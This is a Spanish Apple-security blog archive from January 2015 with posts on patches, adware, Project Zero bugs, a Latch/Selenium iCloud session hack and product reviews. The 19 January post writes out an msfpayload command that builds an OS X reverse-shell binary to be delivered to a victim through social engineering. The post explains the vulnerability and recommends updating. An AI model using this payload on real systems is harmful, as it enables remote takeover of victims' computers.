Menú principal

sábado, 31 de enero de 2015

Edward Snowden NO usa iPhone por temor a ser espiado

Una de las noticias de la semana en el mundo de Apple es la declaración del abogado de Edward Snowden afirmando que su defendido no utiliza dispositivos de Apple. Según sus palabras, el dispositivo de Apple contiene un software especial que puede activarse por sí mismo sin que el propietario de dicho dispositivo tenga que presionar ningún botón. De esta manera se puede recolectar todo tipo de información del dispositivo, y ésta parece ser la razón para la que Edward Snowden se niega a utilizar el dispositivo. Apple no ha tardado en responder a lo que el abogado de Snowden comentaba, y es que esto puede tener una repercusión negativa en la imagen de Apple, afirmando que tanto el dispositivo como el sistema operativo es impenetrable para las agencias de seguridad.

Un comentario que se ha puesto en duda en muchas ocasiones. Apple anunciaba también que al igual que Facebook o Google, siempre están pendientes de las leyes actuales y que permiten a los gobiernos que revisen información personal pero siguiendo escrupulosamente la ley, por ejemplo, mediante el Act Patriot.

Figura 1: Portada de Edward Snowden en la revista Wired

Además, los datos filtrados de la NSA han demostrado que la agencia de seguridad británica GCHQ, ha utilizado identificadores personales de los dispositivos iPhone para rastrear a usuarios. El abogado de Snowden finaliza su declaración comentando que para los usuarios almacenar datos privados en un iPhone es como publicar información en Facebook. De esta misma polémica, ya se habló tiempo atrás en la conferencia HOPE (Hackers On Planet Earth) y en la charla de Jacob Applebaum en el CCC.

viernes, 30 de enero de 2015

Un Hack de Latch para contralar accesos en Apple iCloud

Muchos usuarios han sido víctimas de sesiones olvidadas que quedan abiertas y hoy nuestro compañero de Eleven Paths, Javier Espinosa, nos presenta un "hack" para proteger las sesiones abiertas en iCloud. Tal y como mostró en otro "hack" para proteger sesiones en Facebook, la idea es muy similar, salvo que en iCloud no se puede elegir sobre qué sesión queremos cerrar exactamente, al contrario que en Facebook. Lo primero ha sido ver como iCloud nos ofrece una vista dónde poder forzar el cierre de sesiones que se encuentren abiertas en todos los navegadores, independientemente del número de sesiones.

Esto es fácil, cuando iniciamos sesión en iCloud y navegamos a settings nos encontramos con un enlace que muestra el mensaje "Datos y Seguridad". Pulsando sobre dicho enlace accedemos a una ventana similar a la de la imagen, dónde se puede realizar la acción de cierre de todas las sesiones abiertas en todos los navegadores.

Figura 1: Cerrar todas las sesiones en iCloud

Una vez tenemos la idea de dónde se cierran las sesiones, vamos a proceder a pensar en la idea para protegerlas. Realmente es sencillo, cuando cerremos el cerrojo tendremos una aplicación que esté consultando el estado para, una vez que se comprueba que el cerrojo esté activo, lanzar nuestro script el cual entrará en iCloud y realizará las distintas acciones necesarias para cerrar todas las sesiones abiertas en los navegadores. La idea es clara y sencilla, implementable por cualquier usuario.

Figura 2: Generación de aplicación en el área de developers de Latch

Para comenzar hay que crear una aplicación en el área de developers de Latch. Necesitamos el Secret y el AppID para poder utlizarlos en la aplicación que generaremos para controlar el cambio del cerrojo de Latch.

Figura 3: Ejemplo de código Selenium

Con la aplicación ya creada, o bien utilizando llamadas cURL o con los SDK de Latch, podemos ejecutar nuestro script de pareado donde se emparejará nuestra cuenta de Latch con la nueva aplicación. Con Selenium podemos automatizar las acciones que se realizarían por parte de un usuario para cerrar sesiones en todos los navegadores. A continuación, se puede visualizar un ejemplo de código para llevar a cabo la operativa.


Figura 4: Vídeo demostrativo del hack de Apple iCloud para Latch

Finalmente, y para ejemplificar todo el trabajo realizado, Javier Espinosa ha preparado el siguiente video dónde podemos ver toda la operativo y el cierre de sesiones de iCloud, una vez que el usuario activa Latch.

jueves, 29 de enero de 2015

Apple permite que China audite la seguridad de iPhone

Ya hemos hablado mucho de la relación entre China y Apple, pero es que está dando para relatar una novela. China siempre ha visto con preocupación lo que Apple puede conseguir si se utilizan sus dispositivos en el país. Dicho de otra forma, China no se fía de que detrás esté el gobierno de USA y ha pedido auditar los dispositivos de Apple con el fin de verificar que no serán espiados.  En Diciembre China le recordó a Apple la necesidad de salvaguardar la privacidad y seguridad nacional, en lo que fue una declaración de intenciones.

Un par de meses antes el mundo vio con asombro como el gobierno chino hacia un Man in the Middle a iCloud, lo cual fue impactante de ver. Otra de las noticias que marcaron el 2014, entre la "guerra" de Apple y China fue la prohibición de compra de terminales Apple con dinero público, ante el miedo que el país tenía a ser espiado. Al final ha sido el propio CEO de Apple, Tim Cook, el que ha tenido un gesto positivo para mejorar las relaciones con el gobierno China y ha permitdo a las autoridades del país asiático que auditen la seguridad de los iPhone. Según se ha comunicado de forma pública, China no instalará software para monitorizar las conexiones que se hagan desde el dispositivo, pero como se comenta anteriormente esto es el comunicado oficial. Lo que busca el gobierno chino es asegurar que los productos de la empresa de Cupertino no actúa como un troyano, por el que se pueda colar software espía. 
En otras palabras, y como se trató en el pasado, lo que el gobierno chino pretende es descubrir si los productos de Apple tienen puertas traseras o mecanismos que puedan suponer un peligro para la seguridad nacional. El director de la Oficina de Información y Estado de Internet en China, Lu Wei, ha manifestado en diversas ocasiones la preocupación del país por este hecho. Apple ha decidido aceptar las pretensiones de China debido a la amenaza de que sus productos fueran prohibidos en el mercado chino, lo cual podría suponer un impacto grande en la economía de la empresa. Además, en los planes de Apple está el abrir al menos 5 Apple Store en el país chino, y obtener beneficiones por valor de millones de euros.

miércoles, 28 de enero de 2015

Apple cierra 53 bugs en iOS 8.1.3 y rompe jailbreak

Junto con la última actualización del sistema operativo OS X la compañía Apple ha puesto en circulación la actualización de Apple iOS 8.1.3 para solucionar un total de 53 bugs de seguridad, tal y como están descritos en el Security Advisory APPLE-SA-2015-01-27-2 iOS 8.1.3. Entre la lista de fallos de seguridad se encuentran, como se ha confirmado por Twitter, muchos de los exploits que utilizaban las herramientas de jailbreak, así que los que actualicen se quedarán sin poder usar las herramientas de jailbreak.

Figura 1: Apple Security Advisory para iOS 8.1.3

Entre la lista de bugs corregidos se puede ver que hay muchos que coinciden con los corregidos en la última actualización de OS X, y es por eso que la compañía publica las actualizaciones a la vez, tal y como le reclamaban los expertos en seguridad.

Figura 2: Apple Security Advisory para Apple TV 7.0.3

Por último, si eres usuario de Apple TV también debes actualizar el sistema operativo, ya que está basado en iOS y la compañía ha publicado una actualización con los CVE corregidos, tal y como puedes ver en el Security Advisory APPLE-SA-2015-01-27-1 Apple TV 7.0.3.

Parches críticos para Mac: OS X 10.10.2, Security Update 2015-001, Safari 8.0.3, Safari 7.1.3 y Safari 6.2.3

Ayer Apple ha puesto en circulación actualizaciones de seguridad críticas para los equipos Mac que debes preocuparte por instalar lo antes posible con el fin de cerrar todos los bugs que han sido corregidos. La lista de bugs y actualizaciones es larga, pero entre los que se han eliminado se encuentran los fallos en ThunderBold explotados por ThunderStrike, los crash de Bluetooth en local y por supuesto los tres fallos publicados por el equipo de Google Project Zero hace unos días de forma pública.

La lista completa de bugs corregidos en esta actualización del sistema operativo están recogidos en el Security Advisory APPLE-SA-2015-01-27-4 OS X 10.10.2 and Security Update 2015-001. Un total de 54 CVEs.

Figura 1:Security Advisory para OS X Yosemite 10.10.2 & Security Update 2015-001

Además, en Apple Safari se han corregido 4 bugs críticos que podrían llevar a la ejecución de código remoto e instalación de malware sin interacción del usuario, por lo que se han sacado nuevas versiones de Apple Safari 8.0.3 para OS X Yosemite (incluido en la actualización OS X 10.10.2), y Safari 7.1.3 y 6.2.3 para las versiones anteriores de OSX.

Figura 2: Security Advisory con 4 CVE para Apple Safari

Por último, debido a los 0days explotados en Internet de Adobe Flash Player, Apple ha actualizado los requisitos de ejecución del plugin para que solo funcionen las versiones 16.0.0.296 o superiores en la rama más moderna y en los sistemas operativos antiguos la versión de la rama 13.0.0.264, tal y como se describe en el APPLE-SA-2015-01-27-5 OS X: Flash Player plug-in blocked.

Figura 3: Security Advisory del bloqueo de versiones vulnerables de Adobe Flash Player

Te recomendamos que tanto si tienes un OS X Mountain Lion, OS X Mavericks o el último OS X Yosemite, instales cuanto antes las nuevas versiones de software disponibles viá Software Updates o Mac App Store.

martes, 27 de enero de 2015

Adware OSX/VSearch-D distribuido con Malvertising

Navegando el otro día por la web desde uno de nuestros equipos con OS X, de repente acabé en una web desde la que un anuncio me redirigió a una URL en la que me instaban a instalar un reproductor de vídeo para poder visualizar un contenido. Un viejo truco usado a lo largo de la historia del malware de Windows y OS X para infectarte con todo tipo de hierbas.

Figura 1: Anuncio que me instaba a instalar un Reproductor de Media HD

Como la curiosidad me podía, preparé un entorno y me descargue el fichero asegurándome de que no se ejecutará, para conocer exactamente cuál era el bicho que allí venía, ya que estaba seguro de que eso no podía venir limpio. El fichero se llamaba MPlayerX.dmg, así que estaba especialmente cocinado para mi OS X.

Figura 2: Alerta de la descarga de MPlayerX.dmg

El siguiente paso fue subirlo inmediatamente a Virus Total, para ver qué teníamos por allí y pude ver que se trataba de un adware, conocido como OSX/VSearch y que algunos de los antimalware para sistemas OS X ya lo detectaban como tal.

Figura 3: 10 de los motores Antimalware reconocían al bicho como Adware

La versión en concreto, parece que se ha actualizado a principios de este año y que está ahora en plena expansión, ya que en el archivo de Shopos recogen que la última mutación es del 16 de Enero de 2015. Sin embargo, esta versión es aún un poco más moderna.

Figura 4: OSX/VSearch está siendo distribuido a día de hoy

Por supuesto, no instales esta cosas, así que si puedes ten tu antimalware para OS X con protección en tiempo real y avisa a tus conocidos de esta amenaza que en los foros de Apple se puede ver que hay mucha gente con problemas para limpiar este bicho.

lunes, 26 de enero de 2015

Adobe parchea una vulnerabilidad crítica, pero deja otra para la semana que viene

Adobe ha lanzado una actualización de seguridad crítica para Adobe Flash Player en sistemas operativos OS X, Windows y Linux. Estas vulnerabilidades están siendo utilizadas para instalar malware en los equipos de las víctimas. La actualización liberada no cubre una segunda vulnerabilidad crítica, la cual es explotable. Adobe ha anunciado que la semana que viene tendrá una solución para solventar este 0Day. La amenaza, que se puede materializar en ejecución de código y potencial distribución de malware, parece haber sido centrada en navegadores Internet Explorer y Mozilla Firefox, bajo sistemas Windows, pero hay que tener en cuenta que sistemas OSX y Linux podrían ser el foco también.

La actualización de Adobe para OSX es la versión 16.0.0.287. Como tenemos un Zero Day el cual no tiene parche a día de hoy, sería interesante estudiar deshabilitar el reproductor o utilizar una de las políticas más restrictivas de uso y es que se pregunte siempre antes de utilizar. Esta sería una buena medida para que el usuario pueda visualizar cuando el reproductor va a ser utilizado, y pueda aprobarlo o rechazarlo. La vulnerabilidad CVE-2015-0310 tiene un exploit el cual está siendo utilizado por usuarios maliciosos para tomar el control y poder ejecutar código arbitrario. 

Figura 1: Actualización disponible de Flash

Desde el apartado System Preferences de OS X podemos acceder, como ocurre con Java, a las opciones de Adobe Flash. Es importante monitorizar este apartado para tener instaladas las actualizaciones. Si el usuario no utiliza Flash, es recomendable que desactive el reproductor hasta que el parche sea liberado. Es recomendable estar atento a las posibles novedades sobre este asunto, ya que el 0day es un punto crítico para cualquier sistema.

domingo, 25 de enero de 2015

Ladrones de dispositivos iPad arrestados por un selfie

No es la primera vez que hablamos por aquí de los ladrones en modo EPIC FAIL, y es que a lo largo de los años hemos visto como iCloud ayudaba a delatar a un ladrón peculiar en un barco, o como la probabilidad de que un iPhone sea robado es mayor a que se rompa. Hoy traemos una de esas historias curiosas y que seguro conseguirá esbozar una sonrisa en vosotros lectores. Una cosa tenemos que tener clara y es que si alguno va a tomarse la molestia de robar un dispositivo iPad, al menos se debe limpiar el dispositivo antes de hacerse un selfie.  La Policía de Texas arrestó esta semana a dos ladrones, cuyos nombres vienen reflejados en la noticia publicada por The Next Web, después de que se hicieran un selfie y automáticamente se cargara en la cuenta de iCloud de la víctima.

Uno de los ladrones también confesó haber robado 5.000 dólares, un equipo portátil y otros artículos de la misma víctima. Toda una declaración para los cuerpos de seguridad.

Figura 1: El vídeo los ladrones presumiendo de sus crímines

Una vez que las fotos comenzaron a circular, un usuario de Reddit fue capaz de ponerse en contacto con uno de los amigos de la víctima y proporcionarle los nombres de los ladrones y las fechas de nacimiento. Además, el vídeo que se grabó es el peor de los delitos, ya que es toda una declaración filmada por ellos mismos que a buen seguro el Juez tendrá muy presente.

sábado, 24 de enero de 2015

Google Project Zero publica tres 0days y un exploit de OSX

Project Zero
El equipo de Google dentro de Zero Project tiene como objetivo encontrar vulnerabilidades en el software que utiliza la compañía internamente. Creado a raíz de los grandes bugs descubiertos el año pasado como HeartBleed, Go To Fail o ShellShock, el grupo de investigadores dedican su esfuerzo a buscar 0days en software de terceros. Entre los fallos descubiertos se han hecho notorios los de Windows y ahora los que se acaban de publicar para OS X. Esta publicación trae polémica, ya que el grupo solo da 90 días al fabricante para que los arregle después de notificárselo, lo que para muchos de ellos no les parece suficiente.

Entre los 0days publicados para OS X hay uno que, aunque afecta a OS X Yosemite solo es explotable en OS X Mavericks debido a las medidas de mitigación de la última versión de OS X Yosemite. Los otros dos bugs afectan a todas las versiones ya que tienen que ver con el módulo BlueTooth del sistema, lo que hace pensar que sean formas diversas de explotar los bugs de crash que fueron publicados hace poco.

- OS X networkd "effective_audit_token" XPC type confusion sandbox escape (with exploit)
- OS X IOKit kernel code execution due to NULL pointer dereference in IntelAccelerator
- OS X IOKit kernel memory corruption due to bad bzero in IOBluetoothDevice

De momento no hay solución por parte del fabricante así que habrá que esperar a que Apple saque una actualización de seguridad de OS X Mavericks y OS X Yosemite, ahora forzada por esta publicación de bugs desde Google Project Zero.

viernes, 23 de enero de 2015

LastPass publica una app nativa para el sistema Mac OS X

LastPass es una aplicación que permite almacenar todas las contraseñas bajo una sola contraseña. Esta herramienta es útil, aunque es altamente preferible utilizar un 2FA como puede ser Latch. El almacenamiento de la herramienta se realiza de forma segura, permitiendo hoy día a los usuarios de OS X disfrutar de ella. Por supuesto, la nueva aplicación tiene funcionalidades como en las versiones de otras plataformas, por ejemplo la posibilidad de acceder sitios web logueandose a través de la ejecución de LastPass. Una de las características estrella es la posibilidad de cambiar las contraseñas automáticamente.

Otra de las funcionalidades curiosas que presenta LastPass es la posibilidad de que el usuario pueda conectarse a los sitios web, incluso antes de lanzar el navegador. Se utilizará la funcionalidad de búsqueda rápida de OS X para permitir las búsquedas de un sitio web o encontrar nombres de usuario, notas y contraseñas. A partir de aquí, se puede lanzar sobre los sitios directamente, y LastPass accederá automáticamente.

Figura 1: LastPass para OS X


Otra característica a destacar es el control que permite a los usuarios gestionar la fuerza de la contraseña. Esta característica es típica en los gestores de contraseñas, como por ejemplo KeePass for OS X, pero son realmente útiles para crear una nueva contraseña fuerte, y aconsejar al usuario con las contraseñas débiles. Por último, comentar que LastPass ofrece almacenamiento local para contraseñas y notas seguras, lo cual debería ser útil si se desea acceso a dicha información cuando se desconecta de la red. También se puede sincronizar los datos con la aplicación de iOS. Existen dos tipos de versiones la gratuita con publicidad, y la versión de pago en iTunes por 12 dólares al año.

jueves, 22 de enero de 2015

Java 8 Update 31 para OS X: Oracle lanza actualización crítica que contiene 169 nuevos parches de seguridad

El año no comienza del todo bien para la gente de Oracle y es que ayer lanzó una actualización crítica cuyo contenido tiene una colección de parches para múltiples vulnerabilidades de seguridad. Oracle ha ido recibiendo informes específicos de que su software iba siendo explotado, no solo centrándose en Java. Oracle ha comunicado que recomienda que sus clientes apliquen las actualizaciones necesarias sin dejar pasar el tiempo. 

El número de parches aplicado en esta actualización es de 169, siendo un número muy alto. Los productos afectados son muy variados, siendo esta información detallada por Oracle en su sitio web. Como ejemplo os dejamos un listado breve del software afectado Oracle Java SE y Embedded version, Oracle Virtual Box, SPARC Enterprise, Solaris, Oracle Database Server, etcétera. 

Figura 1: Actualización de Java en OS X

Si tienes Java instalado en tu OS X seguramente hayas visto un mensaje como el que se puede visualizar en la imagen. Se solventan 19 vulnerabilidades en Java, siendo 14 de éstas explotables remotamente sin autenticación. Existen 4 vulnerabilidades con un CVSS igual a 10, y 2 vulnerabilidades con CVSS de 9.3. Esto quiere decir que las vulnerabilidades son realmente críticas. Como recomienda Oracle actualiza urgentemente tu versión de Java y solventa los siguientes fallos de seguridad:

Figura 2: Listado de CVEs que afectan a Java

Visto lo visto, no tardes en actualizar tu Java y evita la ejecución de código arbitrario que estas vulnerabilidades traen consigo.

miércoles, 21 de enero de 2015

Cyberduck: Cliente FTP, SFTP, WebDAV que almacena credenciales de forma segura

Hace 3 años escribimos un post en el que hablábamos de Filezilla y como esta aplicación que permite conectarnos por FTP, SFTP, SSH, FTPS o FTPES no garantizaba la confidencialidad en nuestro disco duro. Es cierto que el atacante debe tener acceso a nuestros archivos, pero hoy día existen cientos de formas de lograrlo. Hoy hablamos de Cyberduck, un cliente similar a Filezilla, que está disponible en la Mac App Store y que cuando probamos como almacena la aplicación las credenciales nos encontramos que almacena las credenciales en el llavero de claves, keychain, del sistema.

Ésta es una de las mejores formas que se tiene en OS X para almacenar las credenciales y garantizar la confidencialidad de los datos sensibles que las aplicaciones manejen diariamente.  ¿Cómo se almacena la información? Al acceder al llavero a través, por ejemplo, de spotlight disponemos de las credenciales que utiliza, tanto el sistema como las aplicaciones. Para acceder al llavero deberemos introducir nuestras credenciales, teniendo permiso para acceder a nuestro llavero. En la imagen se puede ver

Figura 1: Credenciales de Cyberduck en el llavero del sistema

Es recomendable tener el disco duro cifrado para cuando el equipo esté apagado proteger dichos ficheros XML o plist, que herramientas como Filezilla no tenían protegido. Es cierto también que los ficheros quedan protegidos de otros usuarios por permisos, pero siempre se puede tener un descuido o una intrusión que accede a la información en plano. Si utilizas herramientas como Cyberduck puedes estar un poco más tranquilo, ya que realiza una gestión de claves más segura que otras aplicaciones similares.

Figura 2: Mostrar contraseña de Cyberduck en el llavero del sistema

Otra posibilidad es configurar Latch en el servidor FTP para evitar que se puedan ejecutar órdenes o iniciar sesión. Pero algo está claro, y es que este tipo de configuraciones ponen en riesgo la seguridad de todos los servidores, ya que si un equipo robado o que se pierde cuyos datos no están cifrados, tendremos un grave problema de seguridad que se extiende a los servidores remotos. Por esta razón se recomienda, como se comentó anteriormente, tener el disco cifrado, por ejemplo mediante el  uso de FileVault.

martes, 20 de enero de 2015

Sesame: Bloquea y desbloquea tu Mac OS X cuando te alejas o te acercas

Hoy queremos hablamos de Sesame, un llavero que permite bloquear nuestro equipo Mac cuando nos separamos, usando la tecnología BlueTooth o WiFi para medir la distancia. Sesame permite al usuario bloquear automáticamente la pantalla del equipo cuando nos alejamos. Es una buena protección para cuando tenemos que levantarnos corriendo de nuestro sitio y dejamos el equipo desprotegido, y evitaremos el típico ataque David Hasselhoff o que alguien te robe las cookies de Facebook.

Figura 1: Sesame 2

Además, la aplicación es configurable, tanto las acciones de bloqueo y desbloqueo. Por ejemplo, podemos elegir el desbloqueo automático cuando se detecta que el usuario se aproxima, o por ejemplo configurar una protección con contraseña, además. Sesame dispone de un SDK abierto a través de Github con el que se puede desarrollar para la solución. En la página de Github se dispone de una demo de como llevar a cabo la instalación. El framework consta de una parte para OS X, un simulador y otra parte de iOS. La versión Sesame 1 utiliza BlueTooth, mientras que la versión Sesame 2 utiliza la conexión WiFi.

Figura 2: Pasos para configurar Sesame 1

Con esta aplicación, aparte de fortificar el equipo, podremos ahorrar en el consumo de energía del sistema, ya que si el usuario tarda en regresar pondrá en marcha el economizador. Seguridad física en tu bolsillo para proteger tus documentos más sensibles ante un descuido o robo del equipo. Os dejamos un video demostrativo de Sesame.

Figura 3: Demostración de funcionamiento de Sesame

Mientras tanto, si alguien toca tu equipo puedes poner una solución con iAlertU para que le tome una fotografía al amigo intruso del sistema. Fortifica lo máximo que puedas tu equipo, y no te olvides de poner un 2FA con Latch para OS X.

lunes, 19 de enero de 2015

Vulnerabilidades en Mac OS X: IOKit Keyboard Driver

Hoy en Seguridad Apple hablamos de una vulnerabilidad que se publicó en Diciembre de 2014 y que permitía al atacante escalar privilegios en el sistema. La vulnerabilidad se aprovecha de un fallo en el driver del teclado, y a día de hoy existe un módulo implementado en Metasploit.Ya hemos visto en otras ocasiones formas en las que un atacante puede apoderarse de nuestro Mac, por ejemplo mediante la ejecución de un binario el cual devolvía una sesión remota.

Por ejemplo, podemos llevar a cabo esta acción con la herramienta msfpayload, mediante la ejecución de msfpayload osx/x86/shell_reverse_tcp LHOST=[dirección IP atacante] LPORT=[puerto atacante] X y redireccionamos a un fichero. Una vez que un usuario ejecute dicho binario, ya sea de alguna manera mediante las artes de la ingeniería social, obtendremos una shell en nuestro Mac. ¿Qué usuario somos? Realmente seremos el mismo usuario con el que estemos conectados.

Figura 1: msfpayload generando un binario en OS X

Según se puede ver en la inicialización del módulo, dónde podemos ver información sobre a qué sistemas afecta el exploit, podemos leer versión 10.9.5 y, en teoría, versiones previas de OS X. Como puede leerse en la imagen, la vulnerabilidad permitiendo realizar un bypass y escalar privilegio dentro del sistema.

Figura 2: Descripción de la vulnerabilidad

La función check y exploit del módulo permiten verificar la existencia de una vulnerabilidad y la posibilidad de explotarla. Generalmente, la función check utiliza las versiones de los productos para verificar si el software es vulnerable o no, aunque en algunas ocasiones podemos encontrar que se realiza alguna acción ofensiva para chequear la vulnerabilidad.

Figura 3: Check y Exploit

La recomendación es actualizar el sistema operativo, ya que estar por debajo de la versión 10.10 de OS X pone en peligro al equipo. Es cierto que en comparación con otros sistemas operativos del mercado, no hay un número de vulnerabilidades tan grandes como otros con mayor cuota de mercado, pero estos exploits que van apareciendo son ejemplos de fallos de seguridad que van apareciendo cada día en el mundo de la manzana.

domingo, 18 de enero de 2015

Fue Noticia en Seguridad Apple: 5 al 18 de Enero de 2015

Este nuevo año ha comenzado movido en el mundo de la seguridad informática, y estas primeras semanas nos han dejado un buen puñado de noticias interesantes relacionadas con los productos de Apple, así que nos disponemos a resumiros las noticias más relevantes que hemos publicado en Seguridad Apple en los últimos días. Además, como siempre, os ofreceremos una recopilación de algunos artículos de lectura obligatoria publicados en otros sitios de referencia.

El día de Reyes os hablamos de Creepy, una herramienta capaz de obtener información GPS a partir de Twitter, generalmente valiéndose de metadatos de servicios de terceros y aplicaciones como FourSquare.

Con los regalos aún por abrir, el día 6 anunciamos el cierre por parte de Apple de los bugs atacados por iDictPy, la herramienta que permitía realizar ataques de diccionario contra cuentas de Apple.

El miércoles aprovechamos para recordar el deadline del Latch Plugin Contest, un concurso patrocinado por Eleven Paths que ofrece 10000 dólares a los desarrolladores que implementen el plugin de Latch más ingenioso.

Metasploit Framework
El jueves 8 publicamos una recopilación de los módulos de explotación y post-explotación que ofrece Metasploit para sistemas OS X, una información muy útil que todo pentester debería tener a mano.

Al día siguiente, os presentamos una pequeña prueba de concepto sobre cómo bloquear la cuenta de Apple de cualquier usuario conociendo su email, en base a la nueva política de seguridad de Apple para evitar ataques de fuerza bruta.

Comenzamos el fin de semana hablando de un nuevo bug en OS X Spotlight que debido a la carga insegura de contenido externo en un correo electrónico podría permitir a un atacante vulnerar la privacidad de la víctima.

El domingo anunciamos el evento TEDx Gran Vía Salón, un evento en el que Beatriz Cerrolaza, de Alise Devices, hablaría sobre la seguridad documental y la importancia de luchar contra las falsificaciones.

El día 12 hablamos del bypass a OpenSSL Certificate Pinning, un ataque orientado a aplicaciones iOS en el que se sortea el certificate pinning, principal medida de seguridad a la hora de evitar ataques MiTM con suplantación de certificados.

El martes 13, dejando malas suertes de lado, os presentamos una herramienta muy útil, Chrome Remote Desktop, una aplicación de escitorio remoto para controlar equipos desde el navegador de cualquier dispositivo iOS.

Otra herramienta centró nuestra atención a mitad de semana. En este caso, Lirum Device Info, una herramienta de monitorización para dispositivos iOS que permite controlar entre otras cosas el estado de los sensores, el uso de CPU, etc.

Un día después, recopilamos las novedades de la nueva actualización de Adobe Flash Player para OS X, que entre otras cosas resuelve 9 CVEs que ponían en riesgo la privacidad de los usuarios, permitiendo la ejecución de código remoto y otros ataques.

Otra polémica relacionada con las patentes de Apple fue le tema del post del viernes. En esta ocasión, la Oficina de Patentes y Marcas anunción la solicitud de Apple para el almacenamiento de huellas dactilares en iCloud.

Por último, ayer sábado hablamos de los cuatro exploits para crashear el módulo de BlueTooth en OS X 10.10 Yosemite que fueron publicados en Exploits-db. Solo funcionan en local, pero denotan fallos en programación que podrían ser explotados de alguna forma remota en el futuro.

Y esto fue todo lo que publicamos, pero como es tradición, os dejamos aquí una selección de otros artículos que no debéis perdidos. Esta es la lista de hoy:
- Sale el DNI 3.0 con NFC: Y las preocupaciones de seguridad son muchas pero en Security By Default, Yago explica cómo funciona la tecnología que lleva incorporada esta nueva versión de nuestro documento de identidad. 
- Apple demanda a Ericsson: Otra vez demandas por patentes, en este caso por patentes relativas a tecnologías WiFi. 
- Instalar un AV en Android puede ser muy peligroso: No, no es que haya que instalarlo, es que el volumen de Fake AV y Rogue AV que hay en Google Play es altísimo. Aquí una recolección sobre ellos. 
- Un segundo extra podría causar estragos en 2015: Este año hay que ajustar el calendario, haciendo que este año dure un segundo más. Esto podría tener serias repercursiones en los sistemas informáticos. ¿Alguien dijo 9 de Septiembre de 99 o Efecto 2000? 
- Así gestiona Apple las reclamaciones de apps: En iTunes un usuario puede devolver una app durante un periodo de 14 días. Esto puede ser abusado por gente que quiera descargarse apps de pago para cualquier cosa y luego devolverlas. Así es cómo Apple trata con las devoluciones. 
- Virus de Macro en 2015: Aún hoy en día siguen utilizándose los viejos virus de Macro para infectar equipos. Un ejemplo de cómo funcionan hoy en día. 
- Ya hay copias Chinas de Apple Watch en el mercado: Cuatro meses después de que Apple lo anunciara, en el CES 2015 ya se han podido ver copias de origen chino. 
- Un hack de Latch para Facebook... y para Metasploit: No es una integración oficial, pero uno de los ingenieros de Latch de Eleven Paths ha hecho un hack usando la gestión de sesiones de Facebook, Latch y la automatización con Selenium para controlar los accesos a Facebook con Latch. De igual forma, otro compañero se hizo un hack para controlar el uso de Metasploit con Latch. 
- Hackron 2015 - 2ª Con de Hacking en las Islas Canarias: Durante el fin de semana de Carnavales de Santa Cruz de Tenerife, tendrá lugar el fin de semana de la Hackron. Las fechas son 13 y 14 de Febrero y debes apuntarte ya.
- Nuevas Pildoras formativas del Proyecto Thoth: El proyecto de formación en Seguridad de la Información de Criptored ha sacado tres nuevas píldoras sobre cifrado que ya puedes ver en la web. 
Y hasta aquí dio esta sección. Esperamos veros dentro de dos semanas en Fue Noticia y cada día en los artículos de Seguridad Apple.

sábado, 17 de enero de 2015

4 exploits para crashear Bluetooth en OS X Yosemite

Cada día que pasa la cuota de mercado de OSX es mayor, y esto se nota en el interés por explorar su software y la seguridad de éste. Hoy traemos una noticia en la que los investigadores de seguridad  @rpaleari y @joystick han publicado 4 formas de provocar un crash y provocar la caída del sistema operativo OS X Yosemite 10.10 mediante ataques al módulo Bluetooth del mismo en local, que se utiliza para conectarse a dispositivos o para compartir Internet con los terminales iOS.

A continuación enumeramos los 4 exploits publicados que provocan los crash del sistema:

Figura 1: Exploits disponibles en Exploit-DB

Los exploits pueden descargarse desde el sitio web Exploit-DB, en el cual podemos encontrar diversos exploits para OS X. El código en el que está escrito los lenguajes es C, y como puede verse en un comentario al comienzo del código, se indica a qué afecta y cómo debe ser compilado. 

Figura 2: Código del exploit DispatchHCICreateConnection

Visto esto, algo queda claro y es que OS X cada vez está siendo más explorado y se encuentran más vulnerabilidades. Sin embargo, estos fallos son de explotación local y provocan la caída del sistema, pero en Seguridad Apple hemos visto otras vulnerabilidades que permiten la escalada de privilegios o la toma de control del sistema de manera remota. Os dejamos el listado de módulos de Metasploit que hace poco recopilamos para los sistemas OS X y que podáis cacharrear con los exploits y el mundo OS X.

viernes, 16 de enero de 2015

Apple patenta guardar tus huellas dactilares en iCloud

La Oficina de Pantentes y Marcas ha publicado una solicitud de Apple para un almacenamiento de huellas dactilares basada en iCloud, con la que conseguir una solución de sincronización entre dispositivos. Este sistema podría acabar con la configuración de Touch ID manual y podría abrir una nueva vertiente a la próxima generación de puntos de pago y terminales de Apple.Como se describe en la solicitud de patente que Apple ha realizado "Finger Biometric Sensor Data Synchronization Via a Cloud Computing Device and Related Methods" los datos de las huellas pueden ser recogidas en un dispositivo principal para luego ser subidas a iCloud para su difusión en dispositivos secundarios del propio usuario.

Lógicamente, por razones de seguridad, la invención requiere el uso de huellas de usuario y la verificación de la cuenta de datos, es decir, un identificador único más una combinación de ID y contraseña de Apple. Durante la configuración inicial del dispositivo, por ejemplo iPhone, el sistema operativo iOS puede encargar a un propietario o usuario validar su información de cuenta, es decir, su Apple ID antes de inscribirse a través de una huella digital. Los datos reunidos son entonces cifrados y subidos a iCloud. El proceso puede invertirse dependiendo de la implementación, pero la vinculación de los datos biométricos y la verificación de la cuenta es obligatorio.

Figura 1: Solicitud de patente

iCloud enviará datos específicos del usuario a un segundo dispositivo iOS, o varios, por ejemplo un iPad, validará y ejecutará diversas operaciones del sistema. Para verificar esto, Apple recogerá la huella en el segundo dispositivo para verificar los datos. El matching puede tener lugar en el dispositivo original, en el segundo o en la propia nube. Además, el primer dispositivo puede enviar una clave digital al segundo dispositivo para uso de los datos cifrados, que luego se recuperan para su procesamiento.

Figura 2: Registro de huellas por dispositivo

De manera alternativa, dos dispositivos pueden conectar y transferir datos biométricos a través de enlaces inalámbricos locales, como NFC, Bluetooth, usando el mismo cifrado basado en claves. Este método es más seguro que usar iCloud, Internet y puntos de acceso inalámbricos públicos. Apple señala que las conexiones ad-hoc esquivan restricciones gubernamentales en contra de compartir datos biométricos personales a través de redes informáticas compartidas.

¿Cómo se utilizaría esto en un escenario de la vida real? Según describe la patente, un caso interesante sería implicar una compra basada en móviles con Apple Pay, que se encuentra disponible en iPhone 6 y 6 Plus. En este escenario, el segundo dispositivo en el sistema sería un punto de venta terminal equipado con una pantalla táctil, altavoz y sensor de huella dactilares. Los datos biométricos de un usuario se detectan y concuerdan en el proceso explicado anteriormente y se puede validar la compra. El documento no detalla en exceso el método, pero se supone que se activaría a través de NFC. 

Figura 3: Tecnología SmartID para uso empresarial

